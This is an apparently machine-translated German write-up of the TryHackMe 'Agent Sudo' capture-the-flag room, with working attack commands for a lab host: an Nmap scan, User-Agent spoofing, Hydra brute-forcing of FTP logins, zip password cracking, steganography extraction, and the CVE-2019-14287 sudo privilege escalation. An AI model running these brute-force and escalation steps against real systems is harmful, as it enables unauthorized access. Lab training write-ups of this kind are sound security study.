AGENT SUDO AUF TRYHACKME

Jan 14 2023
Der anspruchsvolle Raum im Anfängerpfad in Agent sudo in Tryhackme The lab ist ziemlich langsam, also müssen wir auf Portscanning warten. Fangen wir also an, es gibt so viel zu lernen.

Der anspruchsvolle Raum im Anfängerpfad in Agent sudo in Tryhackme

Das Labor ist Ziemlich langsam, also müssen wir auf Port-Scanning warten.

Fangen wir also an, es gibt so viel zu lernen.

A) Zuerst machen wir NMAP

nmap -sV -sC -A 10.10.111.153

      
                

Also schauen wir in Port 80, welche Webseite auf Http läuft

Es heißt, den Benutzeragenten ändern, um diese Seite zu umgehen. Was können wir also tun?

Wir verwenden das Proxy-Tool 'Burpsuite', was ist das? Werkzeug für Penetrationstests.

Verwenden Sie burp, um die Anfrage abzufangen. Ändern Sie nun den User-Agent auf C

Wenn der User-Agent auf eingestellt ist C, werden wir zu umgeleitet http://10.10.111.153/agent_C_attention.php, wo wir die folgende Nachricht sehen können:

Ich bin davon ausgegangen, dass „chris“ der Benutzer des Systems sein muss.

Was können wir hier tun?

Jetzt wissen wir, dass der Benutzername Chris ist, sodass wir „Hydra“ verwenden können, um mit Brute Force FTP-Anmeldeinformationen von Benutzern zu erhalten.

eintippen

hydra -l chris -P /usr/share/wordlists/rockyou.txt ftp://10.10.111.153

      
                

Melden Sie sich mit FTP-Anmeldeinformationen an

ftp 10.10.111.153

      
                

Wir können Exiftool oder das Steghide-Tool verwenden, um Metadaten des Bildes zu erhalten.

Jetzt bin ich durch die Dateien gegangen und in cutie.png haben wir etwas gefunden

binwalk -e cutie.png

      
                
which extracted all the hidden files in it.

Jetzt müssen wir das Passwort für die Datei 8702.zip knacken

zip2john 8702.zip > out.txt
jonh --wordlist=/usr/share/wordlists/rockyou.txt out.txt

      
                

Extrahieren Sie nun den Inhalt

7z e 8702.zip

      
                

cat To_agentR.txt

      
                

echo "QXJlYTUx" | base64 -d

Lassen Sie uns nun den Text oder die Datei aus cute-alien.jpg extrahieren

steghide extract -sf cute-alien.jpg
# Enter Area51 as passphrase
cat message.txt

      
                

Im nächsten Schritt versuchen wir, uns mit SSH-Anmeldeinformationen anzumelden

ssh [email protected]

Wir haben User-Flag!

Wir versuchen, Alien autospy.jpg mit der Eingabe zu erhalten

sudo scp [email protected]:Alien_autospy.jpg

Rosswell Alien-Autopsie

Um das Root-Flag zu erhalten, müssen wir überprüfen, welche Berechtigungen oder Privilegien wir haben

Dieser ist ein bisschen tryckier. Geben Sie zuerst den Befehl ein.

sudo -l

      
                

CVE-2019–14287

Erweitern Sie die Privilegien

sudo -u#-1 /bin/bash

      
                

Jetzt haben wir alle unsere Antworten, lasst es uns einreichen und wir haben unser CTF erfolgreich abgeschlossen !!

Versuche es weiter, arbeite weiter :)

Danke fürs Lesen!!

Viel Spaß beim Hacken

Author: Xploit Ayush